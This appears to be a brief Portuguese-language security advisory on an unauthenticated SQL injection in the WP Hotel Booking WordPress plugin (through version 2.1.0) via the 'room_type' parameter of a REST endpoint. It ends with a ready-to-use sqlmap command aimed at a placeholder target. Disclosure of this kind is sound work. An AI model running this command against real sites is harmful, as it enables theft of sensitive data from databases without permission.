
WP Hotel Booking <= 2.1.0 - Injeção SQL não autenticada
WP Hotel Booking <= 2.1.0 - Injeção de SQL não autenticada
O plugin WP Hotel Booking para WordPress é vulnerável a Injeção de SQL por meio do parâmetro 'room_type' do endpoint da API REST /wphb/v1/rooms/search-rooms em todas as versões até 2.1.0, inclusive, devido ao escape insuficiente no parâmetro fornecido pelo usuário e à falta de preparação suficiente da consulta SQL existente. Isso possibilita que atacantes não autenticados anexem consultas SQL adicionais às consultas já existentes, que podem ser usadas para extrair informações sensíveis do banco de dados.
sqlmap -u 'https://www.target.com/wp-json/wphb/v1/rooms/search-rooms?check_in_date=2025-01-01&check_out_date=2025-01-10&adults=4&max_child=0&paged=1&room_type=standard' --dbms='MySQL ' --random-agent